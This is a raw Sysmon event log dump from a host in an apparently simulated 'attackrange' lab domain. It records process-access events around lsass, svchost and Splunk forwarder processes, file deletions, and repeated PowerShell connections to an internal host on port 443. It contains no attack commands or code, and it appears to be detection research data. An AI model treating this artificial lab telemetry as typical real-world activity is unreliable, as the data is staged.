18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:29.001{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.986{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:30.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE56087692FD2EAA18F01D4E7FB91F3,SHA256=DB052B562C185C8A3C8D1D8C3A95B8AA87A20360B00AAD4A2D72966558C854FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:55.128{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56481-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:30.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=158384107B87B5B4172F7CCEFE40B8C8,SHA256=62A5B13C8CD5080ED6AB38BA46FACB35778DDB5A0B9B6412D073A5D576EAF151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7D4FAEA5DF960519DB488B7F1D6998F,SHA256=E9895712BDEAC9206853A9A0B7E436CD2908A8243DF48E86509704EF6B63425C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.947{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717aa777.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:32.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD71C48246AF0CE0CB1C588B22B1E8AA,SHA256=EB5119EBAC5499A367D67874E6477AF8A1F0248B188D3228E99FCA37F3090687,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:33.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0986A0DA1434D3504836CB61FAACDB,SHA256=5161D09DE1ED5E8F0230B3FDE6D9C7D1B865F31FA8FB77BE45A58EC0A2C2C8AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.212{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56482-false10.0.1.12-8000- 354300x800000000000000035083476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:00.142{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56483-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:35.367{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=37B7AA17F9D31FB8B486DAFEF8AB623C,SHA256=3ED1C82D0859714B5D7D24ED0ABF482AB5E8F9A90CEBBF510549D25914D1AB96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:34.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3072D89AADCBF887CC53BE0765F378C,SHA256=AABBCE906A60E0D7EE3C0C0764A2E38835BE4CE6F3BF9A720C9E8C769EDAE663,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:36.366{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C24E29C13CB54A7191CE600C1759E76D,SHA256=316FA74C30243935E28722E3012367F9D68BF0DFAEB53ACCB03BD58B25EC74BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:35.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B954C69F4E6465BB63FA5F71F07F77,SHA256=BBE1460B446681AE57CECD71C301D2D17BB5ECFF3187332956F61C79F2C2C113,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:37.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47074EA584A009CF99A240E080005868,SHA256=CC74EDC1C25912D672C265067EB86C2D452B9F3E5F68999D088160686E94C7E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:38.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EE7DB46A01B1AF3C43933E6568037A,SHA256=1A601CE6F54D68D0DDEAC33486088CA9A7F76A0CA49932808A3DBADE09F62901,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:04.155{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56485-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:03.270{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56484-false10.0.1.12-8000- 23542300x800000000000000035083482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:39.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B3ED5606EC9F0582478441A850136CC,SHA256=518D0714A21172D7A297991075C9182CD775346B9191411849A56F36D864CB4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:39.060{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3BE7529DEF320501CE3C27AA296B459,SHA256=7D29F5951A8632DFC40C32588357F0A40203769ACC37EFB5BD18F521803EE859,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:40.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7A425464F23A83331F7A392266872E,SHA256=7943C50CB4E69C0122B1943311642A4FFCA4B8601043C50997C108BFC245BCAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:41.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CAB7CDB953D68B642EEF5E65E123F49,SHA256=421210C4449E8DFF16B7FD58CF83BF4AF017F28FD112B1B0AD6E3A7873FE9A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:42.139{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A686EEC04175148CB704B3ECE98FA0,SHA256=1A7F2B8B9971ADFD3BFE7B3E2D0F299F3289FB2138D85CE45FD26A4D97DDBA4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000035083497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.923{B81B27B7-4CF7-613A-1390-03000000C801}20443900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CF7-613A-1390-03000000C801}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:56.131{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1790-03000000C801}332C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 